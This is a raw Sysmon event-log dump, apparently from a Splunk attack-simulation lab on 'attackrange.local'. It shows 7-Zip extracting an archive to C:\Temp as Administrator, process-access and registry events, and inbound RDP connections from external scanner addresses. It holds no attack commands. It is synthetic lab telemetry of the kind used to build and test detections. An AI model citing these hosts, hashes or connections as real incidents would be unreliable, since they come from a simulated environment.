14:53:10.566{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.566{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.551{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.551{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.535{A7A01FEF-B626-607E-1600-00000000BB01}15402060C:\Windows\system32\svchost.exe{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.535{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.504{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.504{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.504{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.504{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.504{A7A01FEF-C0A3-607E-6C05-00000000BB01}36242592C:\Windows\system32\csrss.exe{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000062883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.504{A7A01FEF-C0A6-607E-8105-00000000BB01}8361124C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\7-Zip\7-zip.dll+4f38|C:\Program Files\7-Zip\7-zip.dll+61c5|C:\Program Files\7-Zip\7-zip.dll+698e|C:\Program Files\7-Zip\7-zip.dll+6aa9|C:\Program Files\7-Zip\7-zip.dll+8771|C:\Windows\System32\SHELL32.dll+80287|C:\Windows\System32\SHELL32.dll+6718e|C:\Windows\System32\SHELL32.dll+17c79c|C:\Windows\System32\SHELL32.dll+19ea68|C:\Windows\System32\SHELL32.dll+2845a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17ca40|C:\Windows\System32\SHELL32.dll+179ebe|C:\Windows\System32\SHELL32.dll+736e1|C:\Windows\System32\SHELL32.dll+765c6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026 154100x800000000000000062882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.509{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe19.007-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Temp\" -an -ai#7zMap354:64:7zEvent16129C:\Windows\system32\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=04FB3AE7F05C8BC333125972BA907398,SHA256=2FB898BACB587F2484C9C4AA6DA2729079D93D1F923A017BB84BEEF87BF74FEF,IMPHASH=9CF6F80DD6DFE9900700C1E11C318B2A{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 13241300x800000000000000062881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000062880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00cdef9a) 13241300x800000000000000062879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d735ec-0x7f411579) 13241300x800000000000000062878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d735f4-0xe1057d79) 13241300x800000000000000062877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d735fd-0x42c9e579) 13241300x800000000000000062876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000062875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00cdef9a) 13241300x800000000000000062874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d735ec-0x7f411579) 13241300x800000000000000062873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d735f4-0xe1057d79) 13241300x800000000000000062872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:10.410{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d735fd-0x42c9e579) 23542300x800000000000000062871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.348{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A2C1E145BCB06BD90631111202BB230,SHA256=0D9C93CAF82655C976331687E868BA007ED9CFBDC0E39D4E58BF4438DEA70400,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049213Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:07.966{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65376-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049212Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:10.047{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=687C724DD9EE4FFB99A55011A969ADA1,SHA256=A183E1D332D2EFFB7CE5DD0167A75512C4731CCA2CF38E2324390A2D6F051F41,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:08.961{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com59735-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:08.904{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-25442-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:08.700{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-28176-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:11.973{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A5A2647A1FD3439618A539EDC9C0A00,SHA256=97CC6FAADEAB4305472EFBD8DD861C3D19EDD8A3DC625611A7C69A919A9AE5CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:11.457{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C997C23F05D83D30EAE8D9159297D5A,SHA256=A1D107A7822F1CC6E0D9AF050B258F273DCC3B63C9E58AC34C0A0A1E9282FF10,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049219Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:09.672{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52467-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049218Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:09.556{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50490-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049217Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:09.349{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63892-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049216Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:09.052{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62258-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049215Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:11.453{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78135C931E3E84B13DE56B5A4F4B0458,SHA256=7DC967FE8DDD2249729484EA799AF246EED65E522DA4CF1EC14376D33C850C59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049214Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:11.063{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E4FD6B6461B1C064D115BB6E7B7C5E7,SHA256=9DA46EA5564C717D0BF3E9229699F31AAE9E592D3DA05A1D90374A59D31C687F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:12.957{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:12.957{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:12.957{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAD6-607E-650B-00000000BB01}6596C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:12.473{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C01C521B47FDC3F91288C9AECAA7BE5E,SHA256=5046B894A1AABEDE1B18B0D2996BECC426E122F81D84536ECE9B0AE10E95794C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049221Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:10.627{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59437-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049220Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:12.094{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DC429275712A05F82CE6CE9715207BB,SHA256=6C8FE60DF669C4F8D00BB75BEA6F7ECA2161DDB946D6F353874C0DDA2E20B8B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.264{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57437-false10.0.1.12-8000- 354300x800000000000000062908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:10.217{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-29543-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:13.488{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AA785628BB4176B7680E888CCEFAC52,SHA256=B0F974CCFEDCC1357BA26D59861F8DCF3442FE0AA7FA01CDFCC68CB092A5C845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049225Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:13.750{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0806717627CE5B560E6B16DA806527D,SHA256=5072B1AFA7CBD65D67E49E457B6ED8FCE7D8FA905EA813C94BCB93B89F822984,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049224Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:11.682{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57978-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049223Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:11.112{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51977-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049222Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:13.141{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6843A873A33AA4D1ED95D469E8B5BD0,SHA256=437E529B10239EA8723BC6E522209ACA3AB90DD27F066F8B84BAE859D3E0BE2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:11.898{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57664-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 